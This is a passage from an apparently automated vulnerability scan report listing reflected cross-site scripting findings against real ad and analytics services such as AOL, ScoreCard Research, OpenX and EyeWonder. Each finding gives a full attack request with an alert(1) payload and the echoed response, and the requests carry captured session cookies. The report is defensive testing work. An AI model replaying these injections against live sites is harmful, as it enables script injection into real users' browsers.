Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA6NTY3Njg6NTYyOTk6NTY3NjE=; Axxd=1; AxData=; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 232

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250?3b2c3"><script>alert(1)</script>8a7aa19fc65=1;adiframe=y">
...[SNIP]...

5.48. http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=300x250 [noperf parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /adiframe/3.0/5113.1/221794/0/-1/size=300x250

Issue detail

The value of the noperf request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99c25"><script>alert(1)</script>e067740386f was submitted in the noperf parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adiframe/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=99c25"><script>alert(1)</script>e067740386f HTTP/1.1
Host: at.atwola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTcwOTQ6NTA5NjE6NTI4NDE6NTExODI6NTY0MTk6NTQwMzI6NTExODY6NTY5ODg6NTY2NzM6NTYxNDg6NTczNjI6NTY5Njk6NjAyMDM6NTY4MzU6NTY5ODc6NTY3ODA6NTAyMjA=; Axxd=1; AxData=1#50085|52841|50963|50507|50086; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=;

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Content-Length: 245

<html><body><base target=_top><script language="JavaScript" type="text/javascript" src="http://at.atwola.com/addyn/3.0/5113.1/221794/0/-1/size=300x250;noperf=1;alias=99c25"><script>alert(1)</script>e067740386f;adiframe=y">
...[SNIP]...

5.49. http://b.scorecardresearch.com/beacon.js [c1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload d2060<script>alert(1)</script>a92a3305e16 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8d2060<script>alert(1)</script>a92a3305e16&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8d2060<script>alert(1)</script>a92a3305e16", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.50. http://b.scorecardresearch.com/beacon.js [c10 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 915f9<script>alert(1)</script>521310be6bf was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196915f9<script>alert(1)</script>521310be6bf&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
th-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196915f9<script>alert(1)</script>521310be6bf", c15:"", c16:"", r:""});



5.51. http://b.scorecardresearch.com/beacon.js [c15 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload d9079<script>alert(1)</script>19388ce5eb8 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15=d9079<script>alert(1)</script>19388ce5eb8 HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"d9079<script>alert(1)</script>19388ce5eb8", c16:"", r:""});



5.52. http://b.scorecardresearch.com/beacon.js [c2 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c2 request parameter is copied into the HTML document as plain text between tags. The payload 1ffa1<script>alert(1)</script>a6c0eeea5f1 was submitted in the c2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=21131ffa1<script>alert(1)</script>a6c0eeea5f1&c3=20&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"21131ffa1<script>alert(1)</script>a6c0eeea5f1", c3:"20", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.53. http://b.scorecardresearch.com/beacon.js [c3 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 93274<script>alert(1)</script>f68b1f5e88b was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=2093274<script>alert(1)</script>f68b1f5e88b&c4=4837&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"2093274<script>alert(1)</script>f68b1f5e88b", c4:"4837", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.54. http://b.scorecardresearch.com/beacon.js [c4 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 85f3a<script>alert(1)</script>fd4bc89f66e was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=483785f3a<script>alert(1)</script>fd4bc89f66e&c5=34872&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"483785f3a<script>alert(1)</script>fd4bc89f66e", c5:"34872", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.55. http://b.scorecardresearch.com/beacon.js [c5 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload 1983e<script>alert(1)</script>b250d769c8e was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=348721983e<script>alert(1)</script>b250d769c8e&c6=&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"348721983e<script>alert(1)</script>b250d769c8e", c6:"", c10:"205196", c15:"", c16:"", r:""});



5.56. http://b.scorecardresearch.com/beacon.js [c6 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 9428f<script>alert(1)</script>87b9579e419 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=20&c4=4837&c5=34872&c6=9428f<script>alert(1)</script>87b9579e419&c10=205196&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://ads.undertone.com/afr.php?zoneid=4837&cb=557126407
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Thu, 12 May 2011 00:59:58 GMT
Date: Thu, 05 May 2011 00:59:58 GMT
Connection: close
Content-Length: 1248

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
e;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"20", c4:"4837", c5:"34872", c6:"9428f<script>alert(1)</script>87b9579e419", c10:"205196", c15:"", c16:"", r:""});



5.57. http://bid.openx.net/json [c parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 4d8c4<script>alert(1)</script>fd80bf050f8 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_274074675974d8c4<script>alert(1)</script>fd80bf050f8&pid=c7be9c39-b00b-4e4a-9ba7-a7008d2ad56b&s=300x250&f=1.19&cid=&url=http%3A%2F%2Fwww.huffingtonpost.com%2F%3Ficid%3Dnavbar_huffpo_main5 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=02dd71c0-6aac-4019-82e3-049e51d96c25

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: s=b884589a-9f2b-4c96-8991-596a4f766c29; version=1; path=/; domain=.openx.net;
Set-Cookie: p=1304557173; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_274074675974d8c4<script>alert(1)</script>fd80bf050f8({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAD2OvU7DMBRGT9qkde1AJAod-e3AYok4IU12V
...[SNIP]...

5.58. http://c.aol.com/read/get_topics [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.aol.com
Path:   /read/get_topics

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 68e91<script>alert(1)</script>d00482f33ea was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /read/get_topics?callback=jQuery1509592739215586334_130457509437568e91<script>alert(1)</script>d00482f33ea&channel_id=2&topic_id=19931896&topic_id=19932040&topic_id=19931885&topic_id=19930667&topic_id=19931276&topic_id=19931747&topic_id=19931406&topic_id=19931226&version=1&_=1304575104324 HTTP/1.1
Host: c.aol.com
Proxy-Connection: keep-alive
Referer: http://www.dailyfinance.com/?icid=navbar_finance_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26D984D8851D3687-40000131C03E6937[CE]; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.415b; s_pers=%20s_getnr%3D1304575100634-Repeat%7C1367647100634%3B%20s_nrgvo%3DRepeat%7C1367647100636%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; RSP_COOKIE=aid=c5999d1676b211e08f73fc32f1f68f78

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:59:06 GMT
Content-Length: 6439

jQuery1509592739215586334_130457509437568e91<script>alert(1)</script>d00482f33ea({
"topicList" : [ {
"type" : "article",
"createdTime" : "2011-05-05T00:30:13.000+0000",
"ndaysViews" : 0,
"viewCount" : 0,
"title" : "Survey: Most Americans Underestimate Retirem
...[SNIP]...

5.59. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpt parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /cm/js/10295-119241-2568-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65460"-alert(1)-"44c1b558e46 was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cm/js/10295-119241-2568-4?mpt=59915460965460"-alert(1)-"44c1b558e46&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link= HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=17671:21707

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:40:10 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=59915460965460"-alert(1)-"44c1b558e46&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d
...[SNIP]...

5.60. http://cdn4.eyewonder.com/cm/js/10295-119241-2568-4 [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /cm/js/10295-119241-2568-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ee58"%3balert(1)//1bf6f78cd31 was submitted in the mpvc parameter. This input was echoed as 1ee58";alert(1)//1bf6f78cd31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /cm/js/10295-119241-2568-4?mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=1ee58"%3balert(1)//1bf6f78cd31 HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=17671:21707

Response (redirected)

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:40:22 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=1ee58";alert(1)//1bf6f78cd31http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/
...[SNIP]...

5.61. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 597ce"%3balert(1)//1b506363a98 was submitted in the mpck parameter. This input was echoed as 597ce";alert(1)//1b506363a98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

